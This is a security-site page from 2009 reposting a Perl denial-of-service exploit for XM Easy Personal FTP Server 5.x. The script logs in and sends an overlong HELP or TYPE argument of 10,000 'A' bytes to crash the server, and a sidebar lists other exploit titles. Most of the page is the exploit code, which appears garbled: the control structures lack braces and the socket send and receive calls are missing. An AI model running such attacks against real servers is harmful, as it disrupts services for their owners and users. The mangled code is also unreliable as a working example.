首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
Denial of service exploit for the XM Easy Personal FTP Server
来源:vinodsharma.mimit[at]gmail.com 作者:Sharma 发布时间:2009-06-11  
#!usr/bin/perl -w

#   XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service
#   via a "HELP" or "TYPE" command with an overly long argument.
#   Refer:
#        												http://secunia.com/advisories/35271/
#        Original advisory avaiable at:	http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/
#		  Product link:	http://www.dxm2008.com/
#$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$
#        Author:    Vinod Sharma
#        Email:     vinodsharma[underscore]mimit[at]gmail.com
#        Blog:       http://securitygyan.com/
#        Date:      09th june, 2009
###Thanks all the Security Folks###

use IO::Socket;

my $server_ip=$ARGV[0];
my $server_port=$ARGV[1];
my $username=$ARGV[2];
my $password=$ARGV[3];
my $command=$ARGV[4];
my $buffer=$command ." " ."\x41" x 10000 ."\r\n";          

if(($#ARGV + 1)!=5)
				print "\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n";
				print "\nargument command can have a value HELP or TYPE\n";
				print "\nExample: XM_FTP_Serv_Exploit.pl 21 anonymous 123456 HELP";

$socket = new IO::Socket::INET (PeerAddr  =>$server_ip,  PeerPort  => $server_port, Proto => 'tcp', )   or die "Couldn't connect to Server\n";

while (1)
    print "RECIEVED: $recv_data"; 
	$send_data1 ="USER ".$username."\r\n";
    print "RECIEVED: $recv_data1"; 
	   $send_data2 ="PASS ".$password."\r\n";
        print "RECIEVED: $recv_data2"; 
	   print "\nAttack is send.....................\n";
        print "RECIEVED: $recv_data3"; 
		close $socket;

[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·Open Biller 0.1 (username) Bli
·phpMyAdmin /scripts/setup.php
·LightNEasy sql/no-db <= 2.2.x
·DX Studio Player < Fi
·Sniggabo CMS (article.php id)
·phpMyAdmin (/scripts/setup.php
·Sniggabo CMS (article.php id)
·Joomla Component com_vehiclema
·Apple iTunes (itms/it
·Joomla Component com_realestat
·Zip Store Chat 4.0/5.0 (Auth B
·MRCGIGUY Hot Links (report.php
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved